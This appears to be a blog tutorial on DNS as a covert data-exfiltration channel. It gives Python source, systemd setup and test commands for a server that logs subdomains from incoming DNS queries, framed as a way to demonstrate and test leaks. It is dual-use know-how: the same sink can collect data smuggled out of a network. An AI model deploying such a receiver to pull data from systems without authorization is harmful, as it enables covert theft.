Introduction
DNS leaks are commonly discussed as a privacy concern when using VPNs or other privacy tools. However, the real danger lies in data exfiltration from protected environments, even those with external access locked down in and out.
The critical vulnerability is this: even if your DNS query goes to your private DNS resolver first, it eventually reaches the public internet to resolve unknown domains. If an attacker crafts a domain with a specifically configured DNS server, they can log these queries and extract sensitive data that was embedded in the subdomain.
This technique bypasses traditional network security controls because DNS traffic is typically allowed outbound, making it an ideal covert channel for data exfiltration.
Live Demonstration
You can see this technique in action right now:
Try this test:
# This will fail to resolve - you'll get "Host not found"
ping leak-test.dnsleak.lorimar.net
Or try opening this in your browser (it will fail to load) http://another-leak-test.dnsleak.lorimar.net/ or http://your-secret-data.dnsleak.lorimar.net/ or any other subdomain of “dnsleak.lorimar.net”
Now check the results:
Visit http://ns.dnsleak.lorimar.net:8291/
and you’ll see leak-test
logged there or whatever test string you’ve used as a hostname (even though the dns name doesn’t actually exist).
Why This Matters
This demonstrates how DNS queries reach someone’s monitoring server, allowing them to capture the subdomain portion - which could contain exfiltrated data.
This guide shows you how to build your own DNS leak detection and monitoring server to:
- Demonstrate the vulnerability to security teams and stakeholders
- Test network security controls and DNS filtering effectiveness
This test captures DNS queries for specific test domains and provides a simple HTTP interface to view the results in real-time.
Test Prerequisites
Before starting, ensure you have:
- Ubuntu 20.04+ server with root access
- Python 3.10 or higher
- Network interface that can capture DNS traffic
How It Works
Create subdomain of yourdomain.com
, e.g. dnsleaktest.yourdomain.com
with NS server pointing to the server, where you are installing the script.
Install the script below.
Use iptables
or another traffic manipulation software of your choice to re-route UDP requests coming to port 53 to sink
daemon port 5353.
Installation and Setup
Step 1: Create the Python Script
Create the directory structure and install the script:
# Create application directory
sudo mkdir -p /opt/dns-monitor
# Create the Python script
sudo nano /opt/dns-monitor/dns_monitor.py
Copy the complete Python script into this file, then set proper permissions:Click to view Python script code
#!/usr/bin/env python3
"""
DNS Subdomain Monitor — UDP proxy **sink** (no upstream, no replies, no root)
- Binds a UDP socket on a high port (default 5353)
- Parses incoming DNS queries, extracts subdomain before `dnsleaktest.yourdomain.com`
- Records uniques **in memory** and serves them via a localhost HTTP UI
- **Does not forward or reply** → external queries are silently dropped
Use with PREROUTING REDIRECT rules.
"""
import gc
import logging
import os
import re
import signal
import socket
import sys
import threading
import time
from datetime import datetime, timedelta
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from socketserver import ThreadingMixIn
from typing import Optional, Tuple
# ----------------------------- DNS helpers ----------------------------- #
def _read_labels(data: bytes, offset: int):
"""Parse DNS labels (RFC1035) with compression pointers. Returns (labels, next_offset) or (None, offset)."""
labels = []
jumped = False
orig_offset = offset
visited = 0
while True:
if offset >= len(data):
return None, offset
length = data[offset]
if length == 0:
offset += 1
break
if (length & 0xC0) == 0xC0:
if offset + 1 >= len(data):
return None, offset + 1
ptr = ((length & 0x3F) << 8) | data[offset + 1]
if visited > 8:
return None, offset + 2
visited += 1
if not jumped:
orig_offset = offset + 2
jumped = True
offset = ptr
continue
start = offset + 1
end = start + length
if end > len(data):
return None, end
labels.append(data[start:end].decode('ascii', errors='ignore'))
offset = end
return labels, (orig_offset if jumped else offset)
def parse_qname_from_query(pkt: bytes) -> Optional[str]:
if len(pkt) < 12:
return None
qdcount = int.from_bytes(pkt[4:6], 'big')
if qdcount < 1:
return None
labels, _ = _read_labels(pkt, 12)
if not labels:
return None
return '.'.join(labels).lower()
# -------------------------- Custom HTTP Server ------------------------ #
class RobustHTTPServer(ThreadingHTTPServer):
"""HTTPServer with better resource management"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Set socket options for better cleanup
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Set timeout to prevent hanging connections
self.timeout = 30
# Allow reuse of address
self.allow_reuse_address = True
# Set daemon threads to True so they don't prevent shutdown
self.daemon_threads = True
# Limit max threads to prevent resource exhaustion
self.max_children = 40
class DNSMonitorHTTPHandler(BaseHTTPRequestHandler):
"""HTTP handler with better resource management"""
def __init__(self, dns_monitor, *args, **kwargs):
self.dns_monitor = dns_monitor
# Set timeouts to prevent hanging connections
self.timeout = 30
super().__init__(*args, **kwargs)
def do_GET(self):
try:
with self.dns_monitor.stats_lock:
self.dns_monitor.stats['http_requests'] += 1
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.send_header('Connection', 'close') # Force connection close
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
content = self.dns_monitor._page_content()
html = self._generate_html(content)
self.wfile.write(html.encode('utf-8'))
except Exception as e:
self.dns_monitor.logger.error(f"HTTP handler error: {e}")
finally:
# Ensure connection is properly closed
try:
self.wfile.close()
except:
pass
def _generate_html(self, content: str) -> str:
return f"""<!DOCTYPE html><html lang='en'><head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>DNS Leak Monitor</title>
<style>body{{font-family:'Courier New',monospace;background:#1a1a1a;color:#00ff00;margin:0;padding:20px}}.container{{max-width:1200px;margin:0 auto}}.header{{background:#2d2d2d;padding:20px;border-radius:8px;margin-bottom:20px;border-left:4px solid #ff6b6b}}.disclaimer{{background:#ff6b6b;color:#fff;padding:15px;border-radius:8px;margin-bottom:20px;font-weight:bold}}.content{{background:#2d2d2d;padding:20px;border-radius:8px;white-space:pre-wrap}}h1{{color:#00ff00;margin:0 0 10px 0}}.subtitle{{color:#888;font-size:14px}}.refresh-info{{color:#ffd700;font-size:12px;text-align:right;margin-top:10px}}</style>
</head><body><div class='container'>
<div class="disclaimer">
⚠️ EDUCATIONAL PURPOSE ONLY: This tool is designed for educational and authorized security testing purposes only.
Users must ensure they have proper authorization before monitoring any network traffic.
Unauthorized use may violate local laws and regulations. Use at your own risk.
<div class="content-section">
<h4>Permitted Usage</h4>
<ul>
<li>Educational research and training</li>
<li>Authorized security assessments</li>
</ul>
</div>
<div class="content-section">
<h4>Legal Requirements</h4>
<ul>
<li>Written authorization from network owners</li>
<li>Compliance with local privacy laws</li>
<li>Adherence to computer crime statutes</li>
</ul>
</div>
<div class="content-section">
<h4>Prohibited Activities</h4>
<ul>
<li>Unauthorized network reconnaissance</li>
<li>Malicious DNS traffic injection</li>
<li>Privacy violations or data theft</li>
</ul>
</div>
<div class="section">
<strong>Liability Disclaimer:</strong>
The developers, contributors, and distributors of this software disclaim all liability for damages resulting from unauthorized or improper use. Users assume full legal and financial responsibility for their actions.
</div>
</div>
<div class='header'><h1>🔍 DNS Leak Monitor</h1>
<div class='subtitle'>Try to lookup, browse or ping any test-hostname.dnsleaktest.yourdomain.com</div>
<div class='refresh-info'>Current time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</div></div>
<div class='content'>{content.replace('<','<').replace('>','>')}</div>
</div></body></html>"""
def log_message(self, format, *args):
# Suppress default HTTP logging to reduce log spam
pass
def handle_one_request(self):
"""Override to add better error handling"""
try:
super().handle_one_request()
except Exception as e:
self.dns_monitor.logger.error(f"HTTP request handling error: {e}")
finally:
# Force cleanup
try:
self.close_connection = True
except:
pass
# ------------------------------ Main class ----------------------------- #
class DNSMonitor:
MAX_ENTRIES = 10 # cap in-memory growth
def __init__(self,
port: int = 8291,
clean_interval: int = 300,
listen: str = "0.0.0.0:5353",
debug: bool = False):
self.port = port
self.clean_interval = clean_interval
self.http_server = None
self.running = False
self.last_cleanup = datetime.now()
self.http_restart_count = 0
self.debug = debug
# In-memory store: subdomain -> first_seen timestamp
self.captured: dict[str, datetime] = {}
self.captured_lock = threading.RLock() # Thread-safe access
# Statistics
self.stats = {
'dns_queries_received': 0,
'dns_queries_parsed': 0,
'subdomains_captured': 0,
'http_requests': 0
}
self.stats_lock = threading.RLock()
# DNS sink settings
self.listen_host, self.listen_port = self._parse_hostport(listen, 5353)
self.dns_sock: Optional[socket.socket] = None
# Suffix to match and extract subdomain from
self.target_suffix = ["dnsleaktest", "yourdomain", "com"]
log_level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(level=log_level, format='%(asctime)s - %(levelname)s - %(message)s')
self.logger = logging.getLogger(__name__)
# ---------------------------- Lifecycle ---------------------------- #
def setup_signal_handlers(self):
def handler(signum, frame):
self.logger.info(f"Received signal {signum}, shutting down...")
self.cleanup(); sys.exit(0)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
def cleanup(self):
self.logger.info("Cleaning up...")
self.running = False
if self.http_server:
try:
self.http_server.shutdown()
self.http_server.server_close()
except Exception as e:
self.logger.error(f"HTTP shutdown: {e}")
if self.dns_sock:
try:
self.dns_sock.close()
except Exception:
pass
# ---------------------------- In-memory store ----------------------- #
def clear_store(self):
with self.captured_lock:
self.captured.clear()
self.last_cleanup = datetime.now()
self.logger.info("Cleared in-memory store")
# Force garbage collection after cleanup
gc.collect()
def start_cleanup_timer(self):
def worker():
while self.running:
try:
time.sleep(self.clean_interval)
if self.running:
self.clear_store()
except Exception as e:
self.logger.error(f"Cleanup worker error: {e}")
threading.Thread(target=worker, daemon=True).start()
self.logger.info(f"Started cleanup timer (interval: {self.clean_interval} seconds)")
def record_subdomain(self, sub: Optional[str]):
if not sub:
return
if not re.fullmatch(r"[a-z0-9_-]+", sub):
self.logger.debug(f"Rejected invalid subdomain format: {sub}")
return
with self.captured_lock:
if sub in self.captured:
return
# cap growth
if len(self.captured) >= self.MAX_ENTRIES:
# drop oldest
oldest_key = next(iter(self.captured))
self.captured.pop(oldest_key)
self.logger.debug(f"Dropped oldest subdomain: {oldest_key}")
self.captured[sub] = datetime.now()
with self.stats_lock:
self.stats['subdomains_captured'] += 1
self.logger.info(f"Captured subdomain: {sub}")
# ---------------------------- DNS sink ----------------------------- #
def _parse_hostport(self, s: str, default_port: int) -> Tuple[str, int]:
if s.startswith("[") and "]" in s:
host, _, rest = s[1:].partition("]")
port = int(rest[1:]) if rest.startswith(":") and rest[1:].isdigit() else default_port
return host, port
if ':' in s and s.count(':') == 1:
h, p = s.split(':', 1)
try: return h, int(p)
except ValueError: return h or '0.0.0.0', default_port
return (s or '0.0.0.0'), default_port
def _extract_target_subdomain(self, qname: str) -> Optional[str]:
labels = qname.split('.')
if len(labels) < 4: return None
if labels[-3:] == self.target_suffix:
return labels[-4].lower()
return None
def start_dns_sink(self):
try:
self.dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Increase socket buffer modestly for burst tolerance
self.dns_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 512 * 1024)
# Set socket timeout to prevent hanging - but longer to avoid too many timeouts
self.dns_sock.settimeout(5.0)
self.dns_sock.bind((self.listen_host, self.listen_port))
self.logger.info(f"DNS sink listening on {self.listen_host}:{self.listen_port}")
except Exception as e:
self.logger.error(f"DNS sink startup failed: {e}")
sys.exit(1)
def serve():
consecutive_errors = 0
max_consecutive_errors = 10
while self.running:
try:
data, addr = self.dns_sock.recvfrom(4096)
consecutive_errors = 0 # Reset error counter on successful receive
with self.stats_lock:
self.stats['dns_queries_received'] += 1
# Parse & record; **do not** reply
try:
qname = parse_qname_from_query(data)
if qname:
with self.stats_lock:
self.stats['dns_queries_parsed'] += 1
sub = self._extract_target_subdomain(qname)
if sub:
self.record_subdomain(sub)
# Log all DNS queries in debug mode
if self.debug:
self.logger.debug(f"DNS query: {qname} from {addr[0]} -> subdomain: {sub}")
else:
if self.debug:
self.logger.debug(f"Failed to parse DNS query from {addr[0]}")
except Exception as e:
self.logger.debug(f"QNAME parse error: {e}")
except socket.timeout:
continue # Normal timeout, continue loop
except OSError as e:
consecutive_errors += 1
if self.running:
self.logger.error(f"DNS socket error #{consecutive_errors}: {e}")
if consecutive_errors >= max_consecutive_errors:
self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
break
time.sleep(0.1) # Brief pause before retry
except Exception as e:
consecutive_errors += 1
self.logger.error(f"DNS receive error #{consecutive_errors}: {e}")
if consecutive_errors >= max_consecutive_errors:
self.logger.error("Too many consecutive DNS errors, stopping DNS sink")
break
time.sleep(0.1) # Brief pause before retry
threading.Thread(target=serve, daemon=True).start()
# --------------------------- HTTP UI with Monitoring --------------- #
def _page_content(self) -> str:
with self.captured_lock:
with self.stats_lock:
if not self.captured:
stats_info = (
f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
f"# Statistics:\n"
f"# DNS queries received: {self.stats['dns_queries_received']}\n"
f"# DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
f"# Subdomains captured: {self.stats['subdomains_captured']}\n"
f"# HTTP requests served: {self.stats['http_requests']}\n"
f"# HTTP server restarts: {self.http_restart_count}\n\n"
"No DNS leak records captured yet.\n\n"
"Debug info:\n"
f"- Listening on {self.listen_host}:{self.listen_port}\n"
f"- Target suffix: {'.'.join(self.target_suffix)}\n"
f"- Debug mode: {'ON' if self.debug else 'OFF'}\n"
)
return stats_info
next_cleanup = self.last_cleanup + timedelta(seconds=self.clean_interval)
header = (
f"# DNS Leak Monitor - Active since {self.last_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
f"# Next cleanup: {next_cleanup.strftime('%Y-%m-%d %H:%M:%S')}\n"
f"# Statistics:\n"
f"# DNS queries received: {self.stats['dns_queries_received']}\n"
f"# DNS queries parsed: {self.stats['dns_queries_parsed']}\n"
f"# Subdomains captured: {self.stats['subdomains_captured']}\n"
f"# HTTP requests served: {self.stats['http_requests']}\n"
f"# HTTP server restarts: {self.http_restart_count}\n"
f"# Unique domains captured: {len(self.captured)}\n"
f"# Captured subdomains (first-seen order):\n\n"
)
body = "\n".join(self.captured.keys())
return header + body
def start_http_server(self):
try:
# Create handler factory that properly binds the dns_monitor instance
def handler_factory(*args, **kwargs):
return DNSMonitorHTTPHandler(self, *args, **kwargs)
self.http_server = RobustHTTPServer(('0.0.0.0', self.port), handler_factory)
self.logger.info(f"HTTP UI: http://0.0.0.0:{self.port}")
# Start server in a separate thread
server_thread = threading.Thread(target=self.http_server.serve_forever, daemon=True)
server_thread.start()
# Start HTTP monitoring thread
self.start_http_monitor()
except Exception as e:
self.logger.error(f"HTTP server failed: {e}")
sys.exit(1)
def start_http_monitor(self):
"""Monitor HTTP server health and restart if needed"""
def monitor():
last_check = time.time()
while self.running:
try:
time.sleep(60) # Check every minute
current_time = time.time()
# Check if server is still responding
if self.http_server and not self._is_http_healthy():
self.logger.warning("HTTP server appears unhealthy, restarting...")
self._restart_http_server()
# Force garbage collection every 10 minutes
if current_time - last_check > 600:
gc.collect()
last_check = current_time
except Exception as e:
self.logger.error(f"HTTP monitor error: {e}")
threading.Thread(target=monitor, daemon=True).start()
self.logger.info("Started HTTP server monitor")
def _is_http_healthy(self) -> bool:
"""Simple health check for HTTP server"""
try:
# Try to create a test socket connection
test_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
test_sock.settimeout(5)
result = test_sock.connect_ex(('127.0.0.1', self.port))
test_sock.close()
return result == 0
except Exception:
return False
def _restart_http_server(self):
"""Restart the HTTP server"""
try:
if self.http_server:
self.http_server.shutdown()
self.http_server.server_close()
# Wait a moment for cleanup
time.sleep(2)
# Force garbage collection
gc.collect()
# Restart server
self.start_http_server()
self.http_restart_count += 1
self.logger.info(f"HTTP server restarted (restart #{self.http_restart_count})")
except Exception as e:
self.logger.error(f"HTTP server restart failed: {e}")
# ------------------------------ Run -------------------------------- #
def run(self):
self.setup_signal_handlers()
self.running = True
self.clear_store()
self.start_cleanup_timer()
self.start_dns_sink()
self.start_http_server()
self.logger.info("DNS Monitor started (sink mode)")
try:
while self.running:
time.sleep(1)
except KeyboardInterrupt:
pass
finally:
self.cleanup()
# ------------------------------ CLI entry ------------------------------ #
def main():
import argparse
p = argparse.ArgumentParser(description='DNS Subdomain Monitor (UDP sink, in-memory)')
p.add_argument('--port', '-p', type=int, default=8291, help='HTTP server port (default: 8291)')
p.add_argument('--clean-interval', '-i', type=int, default=900, help='In-memory cleanup interval in seconds (default: 300=5m)')
p.add_argument('--listen', default='0.0.0.0:5353', help='DNS sink listen address:port (default: 0.0.0.0:5353)')
p.add_argument('--daemon', '-d', action='store_true', help='Run as daemon (fork to background)')
p.add_argument('--debug', action='store_true', help='Enable debug logging')
args = p.parse_args()
if args.daemon:
try:
pid = os.fork()
if pid > 0:
print(f"DNS Monitor sink started with PID: {pid}"); sys.exit(0)
except OSError as e:
print(f"Fork failed: {e}"); sys.exit(1)
os.setsid(); os.chdir('/')
with open('/dev/null', 'r') as f: os.dup2(f.fileno(), sys.stdin.fileno())
with open('/dev/null', 'a') as f: os.dup2(f.fileno(), sys.stdout.fileno()); os.dup2(f.fileno(), sys.stderr.fileno())
DNSMonitor(port=args.port, clean_interval=args.clean_interval, listen=args.listen, debug=args.debug).run()
if __name__ == '__main__':
main()
Set executable permissions
sudo chmod +x /opt/dns-monitor/dns_monitor.py
Step 2: Test the Script
Before creating the service, test the script manually:
# Test basic functionality
sudo python3 /opt/dns-monitor/dns_monitor.py --help
# Run a quick test (Ctrl+C to stop)
sudo python3 /opt/dns-monitor/dns_monitor.py
In another terminal, you can test the HTTP interface:
# Check if the service is responding
curl http://localhost:8291
Creating the Systemd Service
Step 3: Service Configuration
Create user and group
if ! id dnsmon >/dev/null 2>&1; then
sudo groupadd --system dnsmon
sudo useradd --system --no-create-home --shell /usr/sbin/nologin --gid dnsmon dnsmon
fi
Fix ownership of your script directory
sudo chown -R dnsmon:dnsmon /opt/dns-monitor/
sudo chmod 755 /opt/dns-monitor/dns_monitor.py
Create a systemd service file:
sudo nano /etc/systemd/system/dns-monitor.service
The service configuration includes important security and reliability features:
Unit]
Description=DNS Subdomain Monitor Daemon
After=network.target
Wants=network-online.target
[Service]
Type=simple
User=dnsmon
Group=dnsmon
ExecStart=/usr/bin/python3 /opt/dns-monitor/dns_monitor.py
Restart=always
RestartSec=5
StandardOutput=journal
StandardError=journal
SyslogIdentifier=dns-monitor
# Working directory
WorkingDirectory=/opt/dns-monitor
# Environment
Environment=PYTHONUNBUFFERED=1
# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictSUIDSGID=true
RemoveIPC=true
PrivateDevices=true
# Logging
StandardOutput=journal
StandardError=journal
SyslogIdentifier=dnsmon
[Install]
WantedBy=multi-user.target
Step 4: Enable and Start the Service
# Reload systemd configuration
sudo systemctl daemon-reload
# Enable the service to start on boot
sudo systemctl enable dns-monitor.service
# Start the service
sudo systemctl start dns-monitor.service
# Check service status
sudo systemctl status dns-monitor.service
Monitoring the Service
Use these commands to monitor your DNS monitor service:
# View real-time logs
sudo journalctl -u dns-monitor -f
# Check recent logs
sudo journalctl -u dns-monitor --since "10 minutes ago"
# View service resource usage
sudo systemctl show dns-monitor --property=MemoryCurrent,CPUUsageNSec
# Restart if needed
sudo systemctl restart dns-monitor
Testing and Validation
Step 5: Local Testing
Test your DNS leak detection server:
# 1. Verify the service is running
sudo systemctl is-active dns-monitor
# 2. Check if the port is listening
sudo netstat -tulnp | grep 8291
# 3. Test HTTP interface locally
curl http://localhost:8291
# 4. Generate test DNS queries
for i in {1..5}; do
nslookup "test${i}.dnsleaktest.yourdomain.com" 8.8.8.8
sleep 1
done
# 5. Check if queries were captured
curl http://localhost:8291
Remote Testing
From another machine on your network:
# Replace YOUR_SERVER_IP with actual IP
curl http://dnsleaktest.yourdomain.com:8291
# Test with telnet
telnet dnsleaktest.yourdomain.com 8291
Conclusion
This setup enables you to test for privacy leaks in your network infrastructure.